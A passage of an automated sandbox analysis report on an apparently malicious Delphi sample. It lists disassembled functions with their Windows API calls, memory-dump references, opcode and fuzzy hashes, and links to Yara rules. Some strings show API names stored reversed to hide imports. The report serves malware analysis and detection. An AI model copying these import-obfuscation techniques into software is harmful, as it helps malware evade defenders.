                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0AFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B0B000
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B0B017
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B0B0AB
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B0B0B7
                                                                                                                                                                                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B0B0CB
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Read$HandleModule
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: KernelBase$LoadLibraryExA
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2226866862-113032527
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5694022413777776e5a7177a95e3ade235e8e65c140dd7bb9fc9d99723226a6a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8a40071643171e1ee48bd83e50d1da10062d044e95f8022f522a6315bdf4ebb6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5694022413777776e5a7177a95e3ade235e8e65c140dd7bb9fc9d99723226a6a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D318271A40305BBDB61DBA8CCC5F597BA8EF05758F008591FA64AB2C1E734A940CB64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02AF4423,?,?,02B767C8,?,?,02B1E7A8,02AF65B1,02B1D30D), ref: 02AF4395
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02AF4423,?,?,02B767C8,?,?,02B1E7A8,02AF65B1,02B1D30D), ref: 02AF439B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,02AF43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02AF4423,?,?,02B767C8), ref: 02AF43B0
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,02AF43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02AF4423,?,?), ref: 02AF43B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02AF43D4
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ae4b2e21ae5fc8275c9b6897c63662a720e04bb28f3eb935f304241dead3bcc1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4044a8615fc60bca7bf29c599898b032378673231d09ff742ec85dd127a9477d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae4b2e21ae5fc8275c9b6897c63662a720e04bb28f3eb935f304241dead3bcc1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF0BB61AD4344B5F650A3E06D46F5A277C5B49F52F500B89F764950D0DFAC80DC4719
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFAEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02AFAD59
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02AFAD7D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFAD3C: GetModuleFileNameA.KERNEL32(02AF0000,?,00000105), ref: 02AFAD98
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02AFAE2E
                                                                                                                                                                                                                                                                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 02AFAEFB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02AFAF18
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02AFAF1E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,02AFAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02AFAF33
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,02AFAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02AFAF39
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02AFAF5B
                                                                                                                                                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02AFAF71
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 185507032-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 03557df2b197d212e52b2630cb0c14d63b313456e6251f26209a37eba1d12386
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d8e6d8d79c682b8e6374fd4d36e217530fbf20d86f429cb9b217dacf1eabb408
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03557df2b197d212e52b2630cb0c14d63b313456e6251f26209a37eba1d12386
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC111CB2584300BAD280EBE4CE85F9B77FDAB44B40F404916B754DB091DE79E9448B62
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFE58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02AFE625
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02AFE641
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02AFE67A
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02AFE6F7
                                                                                                                                                                                                                                                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02AFE710
                                                                                                                                                                                                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 02AFE745
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 351091851-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a172737e8a79e9d6c567d51e2208cafd40039b51166d1adf08c292b9ef3c5287
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB51EB7594162D9BCBA2DB98CE80BD9B3BDAF49300F0045D5F608E7211DB38AF858F65
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF3598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02AF35BA
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02AF3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02AF35ED
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,02AF3610,00000000,?,00000004,00000000,02AF3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02AF3603
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 298dd6963b14438e0e070a712a00add03cdeea84f192005ddcea02e5b81f4811
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d8313053f61f79c4b1279274a0d46a661c89d486908e2dd420573815078f965b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 298dd6963b14438e0e070a712a00add03cdeea84f192005ddcea02e5b81f4811
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF01B575940258BAFB51DBD0CD42BBAB7FCE708B00F5005A2FF04D7680EA78A510CA59
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B08274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Kernel32$sserddAcorPteG
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 667068680-1372893251
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a9711aec01279bf310897e63b867a7b188f9f8a4cb57bda960c449d58d7e7166
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 112e4be1ffede6d373d30ca137c68b676bb8439d5535bc1862cc4f342327b5fe
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9711aec01279bf310897e63b867a7b188f9f8a4cb57bda960c449d58d7e7166
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35016775680304AFEB45EBE4DD81E5EBBAEEB4CB00F5184A0BA00D7650DE74AE05DA24
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFAA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,02AFAAE7,?,?,00000000), ref: 02AFAA68
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02AFA7E2
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02AFAAE7,?,?,00000000), ref: 02AFAA98
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02AFAAA3
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02AFAAE7,?,?,00000000), ref: 02AFAAC1
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02AFAACC
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4102113445-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 17b0889e731666c5a4c616fef6f65d52f9f9b02c9e030e79f820d2a22c935147
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9c9d33c90ed9fa1d2d33cb66e4e2d2e654e8ac86d596edc0765d2c1ca6e448bf
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17b0889e731666c5a4c616fef6f65d52f9f9b02c9e030e79f820d2a22c935147
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A012FB12802047BF692BAE4CE11BAA736DEB86B10F500060F714A6681DE7C9E008A24
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFAB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,02AFACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02AFAB2F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02AFA7E2
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: eeee$ggg$yyyy
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4232894706-1253427255
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9286bc5890d92b1f59b6aa77a2553ad2b9d5fa7220bb490737a24586b2b95742
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1ac22ffac95c4b0c6754de8ab1c50895dae4641200c1dc019fd89fad2e8856f5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9286bc5890d92b1f59b6aa77a2553ad2b9d5fa7220bb490737a24586b2b95742
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B41A0716442044B97D1ABF989906FFB2FBDB8A340B504525B75AC3356DE3CAD02CA25
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B081CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1883125708-1952140341
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dc04f3f8a9889c79e6c91d2bb17913fe65ff3e4e5c63878edd36dda831a90dea
